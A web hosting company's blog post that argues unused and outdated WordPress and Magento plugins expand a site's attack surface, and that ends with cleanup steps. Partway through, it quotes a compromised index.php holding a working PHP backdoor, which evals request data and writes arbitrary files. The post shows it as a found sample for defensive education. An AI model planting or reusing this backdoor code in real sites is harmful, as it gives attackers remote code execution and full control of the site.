“Plugins” – The unseen Security nightmare

"plugins" - the unseen security nightmare

If you have been around PC's long enough you will remember the early days of Windows and the quest by some people to litter their task bar with tools and utilities possibly thinking it was cool to have so much at their disposal but in reality all they did was rob their usable applications of memory and CPU resources.

Back then security was not an issue like it is today, personally I never installed anything as I knew there was no free lunch and all these plugins came at a cost, be it performance, memory or exposing the machine to more support issues.

It seems many people never learned this lesson and I now see it daily as I clean up exploit after exploit in WordPress sites thanks to poor quality plugins and the set and forget mentality of web site owners. Yes web site development is an iterative process, with the implementation of features and design elements being done step by step over time until everything looks just right. 

It's not just limited to WordPress and other Content Management Systems it also occurs in shopping cart software like Magento where "free" plugins downloaded via the "Magento Connect" facility are tested and found lacking much-needed features, another download later and the number of installed (unusable) plugins has grown. On a system like Magento this can have dramatic consequences on store performance if left running but not actually providing a useful service.

And this is the heart of the problem, If you download a plugin in virtually any system, the code is sitting there ripe for exploitation even if you don't activate it. From an administrators point of view, dozens of plugins mean dozens of directories each with potentially dozens to hundreds of files in each. That's a lot of files to actually scan for exploits when issues arise, and you need to scan every file to see if it's been compromised as current exploits mask the creation and modification dates to avoid detection.

# cd plugins/
# ls -la
total 124
drwxr-xr-x 28 apache apache 4096 Jul 16 07:44 .
drwxr-xr-x 10 apache apache 4096 Jul 16 09:02 ..
drwxr-xr-x  5 apache apache 4096 Nov 18  2013 acf-repeater
drwxr-xr-x  6 apache apache 4096 Apr 30 14:26 admin-menu-editor
drwxr-xr-x  7 apache apache 4096 May 25 11:23 advanced-custom-fields
drwxr-xr-x  4 apache apache 4096 Jun  9 16:49 akismet
drwxr-xr-x 10 apache apache 4096 May 19 08:11 broken-link-checker
drwxr-xr-x  6 apache apache 4096 Apr 30 14:27 cms-tree-page-view
drwxr-xr-x  5 apache apache 4096 Apr 30 14:26 custom-login-page
drwxr-xr-x  3 apache apache 4096 Nov 24  2014 duplicate-post
drwxr-xr-x  4 apache apache 4096 Apr 30 14:27 enable-media-replace
drwxr-xr-x  3 apache apache 4096 May 11 13:05 exclude-pages
drwxr-xr-x  8 apache apache 4096 May 25 11:23 formidable
drwxr-xr-x  4 apache apache 4096 Jun  9 16:50 google-analyticator
drwxr-xr-x  8 apache apache 4096 Jun  9 16:50 gravityforms
-rw-r--r--  1 apache apache   30 Jul 15 11:59 index.php
drwxr-xr-x  9 apache apache 4096 Nov 18  2013 members
drwxr-xr-x  2 apache apache 4096 Nov 24  2014 quick-pagepost-redirect-plugin
drwxr-xr-x  6 apache apache 4096 Nov 24  2014 redirector
drwxr-xr-x  3 apache apache 4096 Oct 16  2013 regenerate-thumbnails
drwxr-xr-x  3 apache apache 4096 Nov 24  2014 responsive-select-menu
drwxr-xr-x  3 apache apache 4096 Jun 17 09:58 sucuri-scanner
drwxr-xr-x  3 apache apache 4096 Nov 24  2014 superfish
drwxr-xr-x  6 apache apache 4096 Apr 30 14:28 tinymce-advanced
drwxr-xr-x  8 apache apache 4096 Jun 17 10:22 updraftplus
drwxr-xr-x  3 apache apache 4096 Nov 24  2014 velvet-blues-update-urls
drwxr-xr-x  5 apache apache 4096 Nov 24  2014 vipers-video-quicktags
drwxr-xr-x 10 apache apache 4096 Jun 17 10:42 wordpress-seo
drwxr-xr-x  2 apache apache 4096 Nov 18  2013 wp-db-backup

#
# CountFiles . -recurse
5294

I ran a file count script on a few sites and on average there was over 5000 files in the plugin directory alone, I haven't even counted the Theme files yet (more on that below).

Let's recap that very important point:

If you download a plugin in virtually any system, the code is sitting there ripe for exploitation even if you don't activate it.

Recently I have written about two new methods of exploit code development that are not detected by current Malware scanners. The outcome of these new exploit attempts is that time needed to be spent writing scripts to specifically detect these types of exploits. The articles are here:

Outdated plugins and plugin code left installed but not active provides the perfect entry point for hackers. The technical term is "attack surface", reduce the entry points reduces the attack surface. With carefully crafted URL's for certain plugins, a hacker can execute code in the plugin to give them access to anything, from your database, site content, to running programs that they have uploaded as "content" but need a mechanism to activate. Once activated these exploits have complete control of your WordPress site.

This index file, has been compromised with 1 line of code
inserted at the start of the file.
Its a common entry point, to activate, they just visit
the page and post a string of data, this enables them to
do anything they want:

<?php
$dkbzrn = "460f1459a273b9d6c302cb37f345a4b0"; if(isset($_REQUEST['saybz'])) { $yneod = $_REQUEST['saybz']; eval($yneod); exit(); } if(isset($_REQUEST['xmnn'])) { $wglj = $_REQUEST['qbtf']; $sttb = $_REQUEST['xmnn']; $uznugl = fopen($sttb, 'w'); $kakpx = fwrite($uznugl, $wglj); fclose($uznugl); echo $kakpx; exit(); }
?><?php
// Silence is golden.

One of the drivers for this article was the discovery today of a "site within a site", a WordPress site with a Russian health site installed inside it, not viewable as you viewed the site normally but the exploited site was then indexed by Google and directing traffic to dubious sites in Eastern Europe. They achieved this by exploiting a plugin and uploading the bogus site file by file.

 

Cleaning Up Plugins

If the security aspect of old outdated and unused plugins isn't enough to encourage you to log in and remove them then you should also consider the performance aspects of having 5000+ files sitting there.

  • Each content render usually involves scanning all plugins to see if they have an interest in the content. This usually applies to ones that are activated, but on most sites they are rarely de-activated.
  • A large number of plugins create database tables, if you leave the old plugin activated then it could well be writing data to your database and slowly filling the underlying file system.
  • In many cases, the growth in database size often has a performance implication that gets worse over time.
  • Many older plugins allow upload of content, often exploits are embedded in content and the outdated code does not protect against this.
  • With more files in your installation, backup times increase as does recovery times and storage for backups goes up as well.

Now here is the last point to consider, everything written above about plugins, also applies to unused themes!

 

Steps for a Safer Site

  1. Do a site backup before you make ANY changes and verify that you have a working backup.
  2. Deactivate unused plugins first, don't just delete them unless they have already been deactivated for some time.
  3. Check the operation of your site to ensure deactivated plugins have not removed ESSENTIAL functionality.
  4. Delete the plugin and when prompted, remove all files and data related to it.
  5. Remove all unused Themes (but beware of child themes that are active). Let's face it, if its not live then chances are you don't want it.

If you keep your CMS small and lightweight then it should run faster and service people's requests quickly. Anything that delays the user experience will drive people away from your site and this is not what you want. Removing unused themes and plugins reduces the attack surface.

 

Back to the Blog

avatar of sid young

Sid Young

  • Conetix
  • Conetix

Let's Get Started

  • This field is for validation purposes and should be left unchanged.